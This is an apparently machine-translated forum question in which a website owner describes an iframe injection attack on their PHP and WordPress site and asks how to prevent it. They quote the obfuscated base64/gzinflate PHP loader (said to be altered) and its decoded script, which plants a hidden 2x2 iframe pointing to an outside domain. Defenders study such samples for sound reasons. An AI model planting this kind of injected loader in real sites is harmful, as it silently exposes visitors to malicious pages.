Trong vài ngày qua, trang web của tôi đã nhiều lần là mục tiêu của cuộc tấn công iframe. Mã được nối chủ yếu vào các trang PHP và Javascript. Mã này là sau đó PHP căn cứ 64 mã hóa, xem ví dụ (Tôi đã thay đổi mã một chút để trung hòa nó):Tấn công iframe trang web - chèn mã vào nguồn
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
được giải mã này trông giống như sau:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
Các một điểm chung là tất cả các mã đều có chú thích "# c3284d #" nên việc theo dõi mã độc không khó. Nhưng nó là tốn thời gian ...
Chúng tôi đang ở trên một máy chủ được chia sẻ tại Gradwell (Anh) và chúng không đặc biệt hữu ích. Vì vậy, câu hỏi là tôi có thể làm gì để ngăn chặn vấn đề này lặp lại chính nó? Tôi biết các cuộc tấn công MySQL Injection và sử dụng mysql_real_escape_string của PHP để bảo vệ chống lại các cuộc tấn công như vậy.
Trang web là ổ đĩa PHP và MySQL. Chúng tôi sử dụng MySQLFTP và có tài khoản shell để truy cập SSH. Chúng tôi sử dụng Wordpress (cập nhật mới nhất với các plugin không kích hoạt).
Có rất nhiều câu chuyện về PHP tồn tại về loại câu hỏi này và tôi khuyến khích bạn tìm kiếm câu hỏi đó. Tuy nhiên, câu trả lời suy nghĩ bên cho câu hỏi này là "[sử dụng một cái gì đó khác với PHP.] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP dễ bị các vấn đề bảo mật hơn –
Một câu hỏi cũ, nhưng vẫn đáng làm cho điểm này: có được một máy quét băm và cài đặt nó trong tài khoản của bạn. Có khá ít trong PHP, từ những gì tôi có thể nói. Các cron này sử dụng để kiểm tra xem tệp nào mới hoặc đã thay đổi và có thể gửi email cho bạn nếu tìm thấy các thay đổi đáng ngờ. – halfer